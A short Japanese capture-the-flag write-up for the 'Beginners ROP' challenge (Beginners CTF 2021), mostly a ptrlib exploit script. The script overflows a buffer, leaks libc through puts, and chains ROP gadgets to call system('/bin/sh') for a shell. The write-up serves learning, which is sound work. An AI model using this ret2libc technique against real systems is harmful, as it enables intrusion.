# Beginners ROP - Beginners CTF Online 2021 ## 概要 gets+puts=自明 ## 解法 ```python= from ptrlib import * libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") elf = ELF("./chall") sock = Process("./chall") rop_pop_rdi = 0x00401283 payload = b'A' * 0x108 payload += flat([ rop_pop_rdi, elf.got('puts'), elf.plt('puts'), elf.symbol('main') ], map=p64) sock.sendline(payload) sock.recvline() libc_base = u64(sock.recvline()) - libc.symbol('puts') libc.set_base(libc_base) payload = b'A' * 0x108 payload += flat([ rop_pop_rdi+1, rop_pop_rdi, next(libc.find('/bin/sh')), libc.symbol('system') ], map=p64) sock.sendline(payload) sock.interactive() ``` ## 感想・意見 - 一番簡単な部類で良いと思う